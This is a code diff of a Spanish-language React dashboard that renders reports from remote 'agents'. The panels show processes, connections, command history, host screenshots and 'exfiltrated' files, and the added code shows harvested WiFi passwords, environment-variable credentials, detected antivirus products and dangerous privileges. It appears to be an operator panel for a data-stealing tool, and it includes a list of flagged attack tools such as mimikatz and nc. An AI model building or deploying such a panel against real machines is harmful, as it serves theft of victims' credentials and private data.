-  "certutil.exe","certutil","bitsadmin.exe","bitsadmin",
-  "whoami.exe","whoami","mimikatz.exe","lsass.exe",
-  "nc.exe","nc","ncat.exe","ncat","python.exe","python","python3","python3.exe",
-]);
-
-// ─── Componentes base ─────────────────────────────────────────────────────────
-function Section({ icon: Icon, label, count, color = "#58a6ff", children, defaultOpen = false, badge }) {
+function Section({ icon: Icon, title, color = BLUE, count, children, defaultOpen = false }) {
   const [open, setOpen] = useState(defaultOpen);
   return (
-    <div className="rounded-xl border overflow-hidden" style={{ background: CARD, borderColor: BORDER }}>
-      <button
-        onClick={() => setOpen(o => !o)}
-        className="w-full flex items-center justify-between px-5 py-4 transition-colors hover:bg-white/[0.02]"
-      >
-        <div className="flex items-center gap-3">
-          <div className="w-8 h-8 rounded-lg flex items-center justify-center shrink-0"
-            style={{ background: `${color}18`, border: `1px solid ${color}30` }}>
-            <Icon size={14} style={{ color }} />
-          </div>
-          <span className="font-semibold text-sm" style={{ color: "#e6edf3" }}>{label}</span>
-          {count !== undefined && (
-            <span className="text-xs font-mono px-2 py-0.5 rounded-full"
-              style={{ background: `${color}15`, color, border: `1px solid ${color}30` }}>
-              {count}
-            </span>
-          )}
-          {badge && (
-            <span className="text-xs font-semibold px-2 py-0.5 rounded-full"
-              style={{ background: "rgba(248,81,73,0.12)", color: "#ffa198", border: "1px solid rgba(248,81,73,0.3)" }}>
-              {badge}
-            </span>
-          )}
+    <div style={{ background: CARD, border: `1px solid ${BORDER}`, borderRadius: 8, overflow: "hidden", marginBottom: 12 }}>
+      <div onClick={() => setOpen(!open)} style={{
+        display: "flex", alignItems: "center", gap: 12, padding: "14px 18px",
+        cursor: "pointer", userSelect: "none",
+        borderBottom: open ? `1px solid ${BORDER}` : "none",
+      }}>
+        <div style={{ background: color + "22", padding: 7, borderRadius: 7, display: "flex" }}>
+          <Icon size={16} color={color} />
         </div>
-        {open
-          ? <ChevronDown size={14} style={{ color: "#6e7681" }} />
-          : <ChevronRight size={14} style={{ color: "#6e7681" }} />}
-      </button>
-      {open && <div style={{ borderTop: `1px solid ${BORDER}` }}>{children}</div>}
-    </div>
-  );
-}
-
-function StatBadge({ label, value, color = "#e6edf3", sub }) {
-  return (
-    <div className="flex flex-col gap-1 px-4 py-3 rounded-lg border"
-      style={{ background: CARD2, borderColor: BORDER }}>
-      <span className="text-xs" style={{ color: "#484f58" }}>{label}</span>
-      <span className="font-bold font-mono text-lg" style={{ color }}>{value}</span>
-      {sub && <span className="text-xs truncate" style={{ color: "#6e7681" }}>{sub}</span>}
-    </div>
-  );
-}
-
-function EmptyState({ msg, sub, icon: Icon = Database }) {
-  return (
-    <div className="flex flex-col items-center justify-center py-10 gap-2">
-      <Icon size={24} style={{ color: "#30363d" }} />
-      <p className="text-sm" style={{ color: "#6e7681" }}>{msg}</p>
-      {sub && <p className="text-xs font-mono" style={{ color: "#484f58" }}>{sub}</p>}
-    </div>
-  );
-}
-
-// ─── Threat Intelligence Summary ──────────────────────────────────────────────
-function ThreatSummary({ report }) {
-  const connections = report.connections || [];
-  const processes   = report.processes   || [];
-  const files       = report.files_exfiltrated || report.filesaccessed || [];
-  const persistence = report.persistence || [];
-
-  // Conexiones externas ESTABLISHED
-  const extConns = connections.filter(c => {
-    if (c.status !== "ESTABLISHED") return false;
-    const remoteIP = extractIP(c.remote);
-    return remoteIP && !isPrivateIP(remoteIP);
-  });
-
-  // Procesos sospechosos en ejecución
-  const suspProcs = processes.filter(p =>
-    SUSPICIOUS_PROC.has((p.name || "").toLowerCase())
-  );
-
-  // Archivos sensibles (docx, pdf, keys)
-  const sensitiveExt = [".pdf", ".doc", ".docx", ".xlsx", ".xls", ".kdbx", ".key", ".pem", ".pfx", ".p12"];
-  const sensitiveFiles = files.filter(f =>
-    sensitiveExt.some(ext => (f.path || "").toLowerCase().endsWith(ext))
-  );
-
-  const items = [
-    extConns.length > 0 && {
-      severity: "high",
-      icon: Network,
-      title: `${extConns.length} conexión${extConns.length > 1 ? "es" : ""} externa${extConns.length > 1 ? "s" : ""} ESTABLISHED`,
-      detail: extConns.slice(0, 3).map(c => parseAddr(c.remote)).join(", "),
-      color: "#f85149",
-    },
-    report.elevated && {
-      severity: "high",
-      icon: Shield,
-      title: "Proceso ejecutándose con privilegios ADMIN / root",
-      detail: `Usuario: ${report.user}`,
-      color: "#f85149",
-    },
-    report.anti_debug && {
-      severity: "medium",
-      icon: AlertTriangle,
-      title: "Técnicas anti-debugging activas",
-      detail: "El sistema tiene mecanismos de detección de análisis",
-      color: "#d29922",
-    },
-    suspProcs.length > 0 && {
-      severity: "medium",
-      icon: Terminal,
-      title: `${suspProcs.length} proceso${suspProcs.length > 1 ? "s" : ""} sospechoso${suspProcs.length > 1 ? "s" : ""} detectado${suspProcs.length > 1 ? "s" : ""}`,
-      detail: suspProcs.slice(0, 5).map(p => p.name).join(", "),
-      color: "#d29922",
-    },
-    persistence.length > 0 && {
-      severity: "medium",
-      icon: Zap,
-      title: `${persistence.length} mecanismo${persistence.length > 1 ? "s" : ""} de persistencia activo${persistence.length > 1 ? "s" : ""}`,
-      detail: String(persistence[0] || ""),
-      color: "#d29922",
-    },
-    sensitiveFiles.length > 0 && {
-      severity: "low",
-      icon: HardDrive,
-      title: `${sensitiveFiles.length} archivo${sensitiveFiles.length > 1 ? "s" : ""} sensible${sensitiveFiles.length > 1 ? "s" : ""} identificado${sensitiveFiles.length > 1 ? "s" : ""}`,
-      detail: sensitiveFiles.slice(0, 2).map(f => f.path?.split(/[/\\]/).pop()).join(", "),
-      color: "#bc8cff",
-    },
-  ].filter(Boolean);
-
-  if (!items.length) return null;
-
-  return (
-    <div className="rounded-xl border overflow-hidden" style={{ background: CARD, borderColor: "#f8514940" }}>
-      <div className="flex items-center gap-3 px-5 py-3"
-        style={{ background: "rgba(248,81,73,0.06)", borderBottom: `1px solid #f8514930` }}>
-        <AlertTriangle size={14} style={{ color: "#f85149" }} />
-        <span className="text-sm font-semibold" style={{ color: "#ffa198" }}>
-          Hallazgos de Seguridad ({items.length})
-        </span>
-      </div>
-      <div className="divide-y" style={{ borderColor: BORDER }}>
-        {items.map((item, i) => (
-          <div key={i} className="flex items-start gap-3 px-5 py-3">
-            <div className="w-6 h-6 rounded flex items-center justify-center shrink-0 mt-0.5"
-              style={{ background: `${item.color}15` }}>
-              <item.icon size={12} style={{ color: item.color }} />
-            </div>
-            <div className="min-w-0 flex-1">
-              <p className="text-sm font-medium" style={{ color: "#e6edf3" }}>{item.title}</p>
-              {item.detail && (
-                <p className="text-xs font-mono mt-0.5 truncate" style={{ color: "#6e7681" }}>{item.detail}</p>
-              )}
-            </div>
-            <span className="text-xs px-2 py-0.5 rounded-full shrink-0"
-              style={{
-                background: `${item.color}15`,
-                color: item.color,
-                border: `1px solid ${item.color}30`,
-              }}>
-              {item.severity === "high" ? "ALTO" : item.severity === "medium" ? "MEDIO" : "INFO"}
-            </span>
-          </div>
-        ))}
-      </div>
-    </div>
-  );
-}
-
-// ─── Tabla de Procesos ────────────────────────────────────────────────────────
-function ProcessTable({ processes }) {
-  const [sortBy, setSortBy]     = useState("cpu");
-  const [showAll, setShowAll]   = useState(false);
-  const [filterSusp, setFilter] = useState(false);
-
-  if (!processes?.length) return <EmptyState msg="Sin procesos registrados" />;
-
-  let list = [...processes];
-  if (filterSusp) list = list.filter(p => SUSPICIOUS_PROC.has((p.name || "").toLowerCase()));
-
-  const sorted = list.sort((a, b) => {
-    if (sortBy === "cpu")  return b.cpu - a.cpu;
-    if (sortBy === "mem")  return b.memory - a.memory;
-    if (sortBy === "pid")  return a.pid - b.pid;
-    return (a.name || "").localeCompare(b.name || "");
-  });
-
-  const visible = showAll ? sorted : sorted.slice(0, 50);
-  const maxCpu  = Math.max(...processes.map(p => p.cpu || 0), 1);
-  const maxMem  = Math.max(...processes.map(p => p.memory || 0), 1);
-  const suspCount = processes.filter(p => SUSPICIOUS_PROC.has((p.name || "").toLowerCase())).length;
-
-  return (
-    <div>
-      <div className="flex items-center gap-3 px-4 py-2 flex-wrap"
-        style={{ background: CARD2, borderBottom: `1px solid ${BORDER}` }}>
-        <button
-          onClick={() => setFilter(f => !f)}
-          className="text-xs px-2.5 py-1 rounded-md transition-colors"
-          style={{
-            background: filterSusp ? "rgba(248,81,73,0.15)" : BORDER,
-            color: filterSusp ? "#ffa198" : "#6e7681",
-            border: `1px solid ${filterSusp ? "#f8514940" : BORDER}`,
-          }}>
-          ⚠ Sospechosos ({suspCount})
-        </button>
-        <span className="text-xs" style={{ color: "#484f58" }}>
-          {list.length} proceso{list.length !== 1 ? "s" : ""} · ordenar por:
-        </span>
-        {[["cpu","CPU"],["mem","Mem"],["pid","PID"],["name","Nombre"]].map(([k,l]) => (
-          <button key={k} onClick={() => setSortBy(k)}
-            className="text-xs px-2 py-0.5 rounded transition-colors"
-            style={{ color: sortBy === k ? "#58a6ff" : "#6e7681", fontWeight: sortBy === k ? 600 : 400 }}>
-            {l}{sortBy === k ? " ↓" : ""}
-          </button>
-        ))}
-      </div>
-      <div className="overflow-auto max-h-96">
-        <table className="w-full text-xs font-mono">
-          <thead>
-            <tr style={{ borderBottom: `1px solid ${BORDER}`, background: "#0d1117" }}>
-              <th className="px-4 py-2 text-left" style={{ color: "#6e7681" }}>PID</th>
-              <th className="px-4 py-2 text-left" style={{ color: "#6e7681" }}>Nombre</th>
-              <th className="px-4 py-2 text-left" style={{ color: "#6e7681" }}>CPU %</th>
-              <th className="px-4 py-2 text-left" style={{ color: "#6e7681" }}>Mem %</th>
-            </tr>
-          </thead>
-          <tbody>
-            {visible.map((p, i) => {
-              const susp = SUSPICIOUS_PROC.has((p.name || "").toLowerCase());
-              return (
-                <tr key={i} className="hover:bg-white/[0.02] transition-colors"
-                  style={{
-                    borderBottom: `1px solid ${BORDER}20`,
-                    background: susp ? "rgba(248,81,73,0.04)" : "transparent",
-                  }}>
-                  <td className="px-4 py-1.5" style={{ color: "#6e7681" }}>{p.pid}</td>
-                  <td className="px-4 py-1.5 max-w-[200px] truncate">
-                    <div className="flex items-center gap-1.5">
-                      {susp && <AlertTriangle size={10} style={{ color: "#f85149", shrink: 0 }} />}
-                      <span style={{ color: susp ? "#ffa198" : "#e6edf3" }}>{p.name}</span>
-                    </div>
-                  </td>
-                  <td className="px-4 py-1.5">
-                    <div className="flex items-center gap-2">
-                      <div className="w-16 h-1.5 rounded-full overflow-hidden" style={{ background: "#21262d" }}>
-                        <div className="h-full rounded-full"
-                          style={{
-                            width: `${Math.min(((p.cpu || 0) / maxCpu) * 100, 100)}%`,
-                            background: (p.cpu || 0) > 50 ? "#f85149" : "#3fb950",
-                          }} />
-                      </div>
-                      <span style={{ color: (p.cpu || 0) > 50 ? "#ff7b72" : "#8b949e" }}>
-                        {(p.cpu || 0).toFixed(1)}
-                      </span>
-                    </div>
-                  </td>
-                  <td className="px-4 py-1.5">
-                    <div className="flex items-center gap-2">
-                      <div className="w-16 h-1.5 rounded-full overflow-hidden" style={{ background: "#21262d" }}>
-                        <div className="h-full rounded-full"
-                          style={{
-                            width: `${Math.min(((p.memory || 0) / maxMem) * 100, 100)}%`,
-                            background: "#58a6ff",
-                          }} />
-                      </div>
-                      <span style={{ color: "#8b949e" }}>{(p.memory || 0).toFixed(1)}</span>
-                    </div>
-                  </td>
-                </tr>
-              );
-            })}
-          </tbody>
-        </table>
-      </div>
-      {sorted.length > 50 && !showAll && (
-        <button
-          onClick={() => setShowAll(true)}
-          className="w-full text-xs py-2.5 transition-colors hover:bg-white/[0.02]"
-          style={{ color: "#58a6ff", borderTop: `1px solid ${BORDER}` }}>
-          Ver todos ({sorted.length - 50} más)
-        </button>
-      )}
-    </div>
-  );
-}
-
-// ─── Tabla de Conexiones ──────────────────────────────────────────────────────
-function ConnectionTable({ connections }) {
-  const [filter, setFilter] = useState("all");
-  if (!connections?.length) return <EmptyState msg="Sin conexiones registradas" />;
-
-  const statusColor = s => {
-    if (s === "ESTABLISHED") return "#3fb950";
-    if (s === "LISTEN")      return "#58a6ff";
-    if (s === "TIME_WAIT")   return "#d29922";
-    if (s === "CLOSE_WAIT")  return "#f85149";
-    return "#6e7681";
-  };
-
-  const est   = connections.filter(c => c.status === "ESTABLISHED").length;
-  const lis   = connections.filter(c => c.status === "LISTEN").length;
-  const extEst = connections.filter(c => {
-    if (c.status !== "ESTABLISHED") return false;
-    return !isPrivateIP(extractIP(c.remote));
-  });
-
-  const filtered = filter === "all"     ? connections
-    : filter === "established" ? connections.filter(c => c.status === "ESTABLISHED")
-    : filter === "external"    ? extEst
-    : connections.filter(c => c.status === "LISTEN");
-
-  return (
-    <div>
-      <div className="flex items-center gap-4 px-5 py-2.5 flex-wrap"
-        style={{ borderBottom: `1px solid ${BORDER}`, background: CARD2 }}>
-        <span style={{ color: "#3fb950" }} className="text-xs font-mono">● {est} ESTABLISHED</span>
-        <span style={{ color: "#58a6ff" }} className="text-xs font-mono">● {lis} LISTEN</span>
-        <span style={{ color: "#f85149" }} className="text-xs font-mono">● {extEst.length} externas</span>
-        <div className="flex gap-1.5 ml-auto">
-          {[["all","Todo"],["established","ESTABLISHED"],["external","Solo externas"],["listen","LISTEN"]].map(([v,l]) => (
-            <button key={v} onClick={() => setFilter(v)}
-              className="text-xs px-2.5 py-0.5 rounded-md transition-colors"
-              style={{
-                background: filter === v ? "#21262d" : "transparent",
-                color: filter === v ? "#e6edf3" : "#6e7681",
-                border: `1px solid ${filter === v ? BORDER : "transparent"}`,
-              }}>
-              {l}
-            </button>
-          ))}
-        </div>
-      </div>
-      <div className="overflow-auto max-h-80">
-        <table className="w-full text-xs font-mono">
-          <thead>
-            <tr style={{ borderBottom: `1px solid ${BORDER}`, background: "#0d1117" }}>
-              {["Proto","Local","Remoto","Estado"].map(h => (
-                <th key={h} className="px-4 py-2 text-left" style={{ color: "#6e7681" }}>{h}</th>
-              ))}
-            </tr>
-          </thead>
-          <tbody>
-            {filtered.map((c, i) => {
-              const remoteIP  = extractIP(c.remote);
-              const isExt     = !isPrivateIP(remoteIP) && remoteIP;
-              const local     = parseAddr(c.local)  || "—";
-              const remote    = parseAddr(c.remote) || "—";
-              return (
-                <tr key={i} className="hover:bg-white/[0.02] transition-colors"
-                  style={{
-                    borderBottom: `1px solid ${BORDER}20`,
-                    background: isExt && c.status === "ESTABLISHED" ? "rgba(248,81,73,0.04)" : "transparent",
-                  }}>
-                  <td className="px-4 py-1.5">
-                    <span className="px-1.5 py-0.5 rounded uppercase"
-                      style={{ background: "#21262d", color: "#79c0ff" }}>
-                      {c.protocol}
-                    </span>
-                  </td>
-                  <td className="px-4 py-1.5 truncate max-w-[160px]" style={{ color: "#8b949e" }}>
-                    {local}
-                  </td>
-                  <td className="px-4 py-1.5 truncate max-w-[160px]">
-                    <div className="flex items-center gap-1.5">
-                      {isExt && <Globe size={10} style={{ color: "#f85149", shrink: 0 }} />}
-                      <span style={{ color: isExt ? "#ffa198" : remote !== "—" ? "#e6edf3" : "#484f58" }}>
-                        {remote}
-                      </span>
-                    </div>
-                  </td>
-                  <td className="px-4 py-1.5" style={{ color: statusColor(c.status) }}>
-                    {c.status || "—"}
-                  </td>
-                </tr>
-              );
-            })}
-          </tbody>
-        </table>
-      </div>
-    </div>
-  );
-}
-
-// ─── Historial de comandos ────────────────────────────────────────────────────
-function CommandHistory({ commands }) {
-  if (!commands?.length) return <EmptyState msg="Sin historial de comandos" sub="No se encontró PSReadLine history" />;
-  return (
-    <div className="p-4 overflow-auto max-h-80"
-      style={{ background: "#0d1117", fontFamily: "'JetBrains Mono', 'Fira Code', monospace" }}>
-      {commands.map((cmd, i) => (
-        <div key={i} className="flex items-start gap-2 py-0.5">
-          <span className="shrink-0 select-none text-sm" style={{ color: "#3fb950" }}>
-            {String(i + 1).padStart(3, " ")} $
+        <span style={{ fontWeight: 600, color: "#e6edf3", flex: 1 }}>{title}</span>
+        {count != null && (
+          <span style={{ background: color + "22", color, borderRadius: 10, padding: "1px 9px", fontSize: 12, fontWeight: 700 }}>
+            {count}
           </span>
-          <span className="text-sm break-all" style={{ color: "#c9d1d9" }}>{cmd}</span>
+        )}
+        {open ? <ChevronDown size={14} color={MUTED} /> : <ChevronRight size={14} color={MUTED} />}
+      </div>
+      {open && <div style={{ padding: 18 }}>{children}</div>}
+    </div>
+  );
+}
+
+function StatCard({ label, value, color = "#e6edf3", sub }) {
+  return (
+    <div style={{ background: CARD, border: `1px solid ${BORDER}`, borderRadius: 8, padding: "16px 20px", flex: 1, minWidth: 130 }}>
+      <div style={{ color: MUTED, fontSize: 11, marginBottom: 4, textTransform: "uppercase", letterSpacing: 1 }}>{label}</div>
+      <div style={{ color, fontSize: 22, fontWeight: 700, fontFamily: "monospace" }}>{safe(value)}</div>
+      {sub && <div style={{ color: MUTED, fontSize: 11, marginTop: 3 }}>{sub}</div>}
+    </div>
+  );
+}
+
+function CopyButton({ value }) {
+  const [copied, setCopied] = useState(false);
+  const copy = () => {
+    navigator.clipboard.writeText(value);
+    setCopied(true);
+    setTimeout(() => setCopied(false), 1500);
+  };
+  return (
+    <button onClick={copy} style={{ background: "none", border: "none", cursor: "pointer", color: copied ? GREEN : MUTED, padding: 0 }}>
+      {copied ? <CheckCircle size={13} /> : <Copy size={13} />}
+    </button>
+  );
+}
+
+function Chip({ label, color = BLUE }) {
+  return (
+    <span style={{
+      background: color + "18", border: `1px solid ${color}33`,
+      color, borderRadius: 20, padding: "3px 10px", fontSize: 12, whiteSpace: "nowrap"
+    }}>
+      {label}
+    </span>
+  );
+}
+
+// ── WiFi ─────────────────────────────────────────────────────────────────────
+function WiFiSection({ networks }) {
+  const nets = arr(networks);
+  if (!nets.length) return <p style={{ color: MUTED, fontSize: 13 }}>Sin redes WiFi encontradas.</p>;
+  return (
+    <div style={{ display: "flex", flexDirection: "column", gap: 8 }}>
+      {nets.map((n, i) => (
+        <div key={i} style={{
+          background: BG, border: `1px solid ${BORDER}`, borderRadius: 6,
+          padding: "10px 14px", display: "flex", alignItems: "center", gap: 12
+        }}>
+          <Wifi size={14} color={n.password ? GREEN : MUTED} />
+          <span style={{ color: "#e6edf3", fontWeight: 600, flex: 1, fontFamily: "monospace" }}>{n.ssid}</span>
+          {n.password ? (
+            <span style={{ color: GREEN, fontFamily: "monospace", fontSize: 13, background: GREEN + "15", padding: "2px 10px", borderRadius: 4 }}>
+              {n.password}
+            </span>
+          ) : (
+            <span style={{ color: MUTED, fontSize: 12 }}>Sin contraseña / Open</span>
+          )}
         </div>
       ))}
     </div>
   );
 }
 
-// ─── Archivos ─────────────────────────────────────────────────────────────────
-function FileList({ files }) {
-  const [showAll, setShowAll] = useState(false);
-  if (!files?.length) return <EmptyState msg="Sin archivos registrados" />;
-
-  const extColor = ext => ({
-    ".pdf":  "#f85149", ".doc": "#58a6ff", ".docx": "#58a6ff",
-    ".xlsx": "#3fb950", ".xls": "#3fb950", ".txt":  "#6e7681",
-    ".kdbx": "#bc8cff", ".pem": "#d29922", ".key":  "#d29922",
-    ".pfx":  "#d29922", ".p12": "#d29922",
-  }[ext] || "#484f58");
-
-  const visible = showAll ? files : files.slice(0, 30);
-
+// ── Usuarios locales ──────────────────────────────────────────────────────────
+function LocalUsersSection({ users }) {
+  const list = arr(users);
+  if (!list.length) return <p style={{ color: MUTED, fontSize: 13 }}>Sin usuarios encontrados.</p>;
   return (
-    <div>
-      <div className="overflow-auto max-h-96">
-        {visible.map((f, i) => {
-          const parts = (f.path || "").replace(/\\/g, "/").split("/");
-          const name  = parts.pop() || f.path;
-          const dir   = parts.join("/") || "";
-          const ext   = ("." + name.split(".").pop()).toLowerCase();
-          const color = extColor(ext);
-          return (
-            <div key={i} className="flex items-start gap-3 px-5 py-2.5 hover:bg-white/[0.02] transition-colors"
-              style={{ borderBottom: i < visible.length - 1 ? `1px solid ${BORDER}` : "none" }}>
-              <span className="shrink-0 text-xs font-mono font-bold px-1.5 py-0.5 rounded mt-0.5"
-                style={{ background: `${color}15`, color, border: `1px solid ${color}25`, minWidth: "40px", textAlign: "center" }}>
-                {ext.slice(1).toUpperCase()}
-              </span>
-              <div className="min-w-0 flex-1">
-                <p className="text-sm font-mono font-semibold truncate" style={{ color: "#e6edf3" }}>{name}</p>
-                <p className="text-xs font-mono mt-0.5 truncate" style={{ color: "#484f58" }}>{dir}</p>
-                <p className="text-xs font-mono mt-0.5 break-all" style={{ color: "#30363d" }}>
-                  {f.sha256 || f.hash || "—"}
-                </p>
-              </div>
-            </div>
-          );
-        })}
-      </div>
-      {files.length > 30 && !showAll && (
-        <button
-          onClick={() => setShowAll(true)}
-          className="w-full text-xs py-2.5 transition-colors hover:bg-white/[0.02]"
-          style={{ color: "#58a6ff", borderTop: `1px solid ${BORDER}` }}>
-          Ver todos ({files.length - 30} más)
-        </button>
-      )}
+    <table style={{ width: "100%", borderCollapse: "collapse", fontSize: 13 }}>
+      <thead>
+        <tr style={{ borderBottom: `1px solid ${BORDER}` }}>
+          {["Usuario", "Administrador", "Estado"].map(h => (
+            <th key={h} style={{ padding: "6px 12px", textAlign: "left", color: MUTED, fontWeight: 600, fontSize: 11, textTransform: "uppercase" }}>{h}</th>
+          ))}
+        </tr>
+      </thead>
+      <tbody>
+        {list.map((u, i) => (
+          <tr key={i} style={{ borderBottom: `1px solid ${BORDER}66` }}>
+            <td style={{ padding: "8px 12px", color: "#e6edf3", fontFamily: "monospace", fontWeight: 600 }}>{u.username}</td>
+            <td style={{ padding: "8px 12px" }}>
+              {u.is_admin
+                ? <Badge label="ADMIN" color={RED} />
+                : <span style={{ color: MUTED, fontSize: 12 }}>—</span>}
+            </td>
+            <td style={{ padding: "8px 12px" }}>
+              {u.is_active
+                ? <Badge label="Activo" color={GREEN} />
+                : <Badge label="Inactivo" color={MUTED} />}
+            </td>
+          </tr>
+        ))}
+      </tbody>
+    </table>
+  );
+}
+
+// ── AV / EDR ──────────────────────────────────────────────────────────────────
+function SecuritySection({ products }) {
+  const list = arr(products);
+  if (!list.length) return (
+    <div style={{ display: "flex", alignItems: "center", gap: 8 }}>
+      <AlertTriangle size={14} color={YELLOW} />
+      <span style={{ color: YELLOW, fontSize: 13 }}>No se detectó ningún producto de seguridad</span>
+    </div>
+  );
+  return (
+    <div style={{ display: "flex", flexWrap: "wrap", gap: 8 }}>
+      {list.map((p, i) => (
+        <div key={i} style={{
+          background: GREEN + "15", border: `1px solid ${GREEN}33`,
+          borderRadius: 6, padding: "8px 14px", display: "flex", alignItems: "center", gap: 8
+        }}>
+          <Shield size={13} color={GREEN} />
+          <span style={{ color: GREEN, fontWeight: 600 }}>{p}</span>
+        </div>
+      ))}
     </div>
   );
 }
 
-// ─── Persistencia ─────────────────────────────────────────────────────────────
-function PersistenceList({ items }) {
-  if (!items?.length) return <EmptyState msg="Sin mecanismos de persistencia detectados" />;
+// ── Privilegios ───────────────────────────────────────────────────────────────
+function PrivilegesSection({ privileges }) {
+  const list = arr(privileges);
+  const dangerous = ["SeDebugPrivilege","SeImpersonatePrivilege","SeAssignPrimaryTokenPrivilege","SeTcbPrivilege","SeCreateTokenPrivilege","SeLoadDriverPrivilege"];
+  if (!list.length) return <p style={{ color: MUTED, fontSize: 13 }}>Sin privilegios habilitados.</p>;
   return (
-    <div className="p-4 space-y-2">
-      {items.map((item, i) => {
-        const text     = typeof item === "string" ? item : JSON.stringify(item);
-        const colonIdx = text.indexOf(":");
-        const prefix   = colonIdx > -1 ? text.slice(0, colonIdx) : text;
-        const rest     = colonIdx > -1 ? text.slice(colonIdx + 1).trim() : "";
-        const tl       = text.toLowerCase();
-        const color    =
-          tl.includes("runkey") || tl.includes("run") ? "#d29922" :
-          tl.includes("startup")                       ? "#f85149" :
-          tl.includes("cron") || tl.includes("bashrc") ? "#bc8cff" :
-          tl.includes("systemd")                       ? "#ff7b72" : "#58a6ff";
+    <div style={{ display: "flex", flexWrap: "wrap", gap: 8 }}>
+      {list.map((p, i) => {
+        const isDangerous = dangerous.some(d => p.includes(d));
         return (
-          <div key={i} className="flex items-start gap-3 px-4 py-3 rounded-lg"
-            style={{ background: `${color}0d`, border: `1px solid ${color}25` }}>
-            <AlertTriangle size={13} className="mt-0.5 shrink-0" style={{ color }} />
-            <div className="font-mono text-xs min-w-0 flex-1">
-              <span className="font-semibold" style={{ color }}>{prefix}:</span>
-              <span className="break-all ml-1" style={{ color: "#c9d1d9" }}>{rest}</span>
-            </div>
+          <div key={i} style={{
+            background: isDangerous ? RED + "18" : BG,
+            border: `1px solid ${isDangerous ? RED + "55" : BORDER}`,
+            borderRadius: 6, padding: "6px 12px", display: "flex", alignItems: "center", gap: 6
+          }}>
+            {isDangerous && <AlertTriangle size={11} color={RED} />}
+            <span style={{ color: isDangerous ? RED : "#c9d1d9", fontFamily: "monospace", fontSize: 12 }}>{p}</span>
           </div>
         );
       })}
@@ -559,352 +202,492 @@ function PersistenceList({ items }) {
   );
 }
 
-// ─── IPs / DNS ────────────────────────────────────────────────────────────────
-function ChipList({ items, color = "#58a6ff" }) {
-  if (!items?.length) return <EmptyState msg="Sin datos" />;
+// ── Variables de entorno con credenciales ─────────────────────────────────────
+function EnvCredsSection({ creds }) {
+  const list = arr(creds);
+  if (!list.length) return <p style={{ color: MUTED, fontSize: 13 }}>No se encontraron credenciales en variables de entorno.</p>;
   return (
-    <div className="flex flex-wrap gap-2 px-5 py-4">
-      {items.map((item, i) => (
-        <span key={i} className="px-3 py-1 rounded-full text-xs font-mono"
-          style={{ background: `${color}15`, color, border: `1px solid ${color}30` }}>
-          {item}
-        </span>
-      ))}
-    </div>
+    <table style={{ width: "100%", borderCollapse: "collapse", fontSize: 13, fontFamily: "monospace" }}>
+      <thead>
+        <tr style={{ borderBottom: `1px solid ${BORDER}` }}>
+          {["Variable", "Valor (parcial)"].map(h => (
+            <th key={h} style={{ padding: "6px 12px", textAlign: "left", color: MUTED, fontWeight: 600, fontSize: 11, textTransform: "uppercase", fontFamily: "sans-serif" }}>{h}</th>
+          ))}
+        </tr>
+      </thead>
+      <tbody>
+        {list.map((c, i) => (
+          <tr key={i} style={{ borderBottom: `1px solid ${BORDER}44` }}>
+            <td style={{ padding: "7px 12px", color: YELLOW }}>{c.key}</td>
+            <td style={{ padding: "7px 12px", color: "#e6edf3" }}>{c.value}</td>
+          </tr>
+        ))}
+      </tbody>
+    </table>
   );
 }
 
-// ─── Screenshot ───────────────────────────────────────────────────────────────
-function ScreenshotSection({ agentId, hostname, lastSeen }) {
-  const [loaded, setLoaded] = useState(false);
-  const [err,    setErr]    = useState(false);
-  const [modal,  setModal]  = useState(false);
-  const url = agentId ? `http://localhost:5000/tmp/${agentId}.png` : null;
-
-  if (!url) return <EmptyState msg="Agent ID no disponible" />;
-
+// ── Navegadores ───────────────────────────────────────────────────────────────
+function BrowserSection({ browsers }) {
+  const list = arr(browsers);
+  if (!list.length) return <p style={{ color: MUTED, fontSize: 13 }}>No se detectaron navegadores.</p>;
+  const icons = { "Google Chrome": "🌐", "Mozilla Firefox": "🦊", "Microsoft Edge": "🔷", "Brave": "🦁", "Opera": "🎭", "Vivaldi": "🎻" };
   return (
-    <div className="p-4">
-      {err ? (
-        <EmptyState msg="Captura no disponible" sub={`${agentId}.png`} icon={Camera} />
-      ) : (
-        <div className="space-y-3">
-          <div className="relative rounded-lg overflow-hidden cursor-pointer group"
-            style={{ background: "#0d1117", border: `1px solid ${BORDER}` }}
-            onClick={() => loaded && setModal(true)}>
-            <img src={url} alt="screenshot"
-              className="w-full object-contain max-h-64"
-              onLoad={() => setLoaded(true)}
-              onError={() => setErr(true)}
-              style={{ display: loaded ? "block" : "none" }} />
-            {!loaded && !err && (
-              <div className="flex items-center justify-center h-32">
-                <Camera size={24} style={{ color: "#484f58" }} />
-              </div>
-            )}
-            {loaded && (
-              <div className="absolute inset-0 bg-black/0 group-hover:bg-black/40 transition-all flex items-center justify-center">
-                <Maximize2 size={20} className="opacity-0 group-hover:opacity-100 transition-opacity text-white" />
-              </div>
-            )}
-          </div>
-          <div className="flex items-center justify-between text-xs font-mono" style={{ color: "#6e7681" }}>
-            <span>{hostname} · {formatDate(lastSeen)}</span>
-            <a href={url} download={`screenshot_${agentId}.png`}
-              className="flex items-center gap-1 hover:text-blue-400 transition-colors">
-              <Download size={11} /> Descargar
-            </a>
-          </div>
-        </div>
-      )}
-      {modal && (
-        <div className="fixed inset-0 z-50 flex items-center justify-center bg-black/85 p-4"
-          onClick={() => setModal(false)}>
-          <button className="absolute top-4 right-4 text-white/60 hover:text-white transition-colors">
-            <X size={24} />
-          </button>
-          <img src={url} alt="fullscreen" className="max-w-full max-h-full rounded-lg shadow-2xl"
-            onClick={e => e.stopPropagation()} />
-        </div>
-      )}
-    </div>
-  );
-}
-
-// ─── Blockchain ────────────────────────────────────────────────────────────────
-function BlockchainInfo({ report }) {
-  const { sequence, prev_hash, hash } = report;
-  return (
-    <div className="p-5 space-y-3">
-      {[
-        { label: "Secuencia",     value: `#${sequence ?? "—"}`, icon: Hash, color: "#58a6ff", mono: false },
-        { label: "Hash bloque",   value: hash || "—",           icon: Key,  color: "#3fb950", mono: true  },
-        { label: "Hash anterior", value: prev_hash || "genesis",icon: Link, color: "#6e7681", mono: true  },
-      ].map(({ label, value, icon: Icon, color, mono }) => (
-        <div key={label} className="flex items-start gap-3">
-          <Icon size={13} className="mt-0.5 shrink-0" style={{ color }} />
-          <div className="min-w-0 flex-1">
-            <p className="text-xs" style={{ color: "#484f58" }}>{label}</p>
-            <p className={`text-sm truncate ${mono ? "font-mono" : "font-semibold"}`} style={{ color: "#e6edf3" }}>
-              {value}
-            </p>
-          </div>
-          {mono && value !== "genesis" && (
-            <button className="shrink-0 hover:text-blue-400 transition-colors" style={{ color: "#484f58" }}
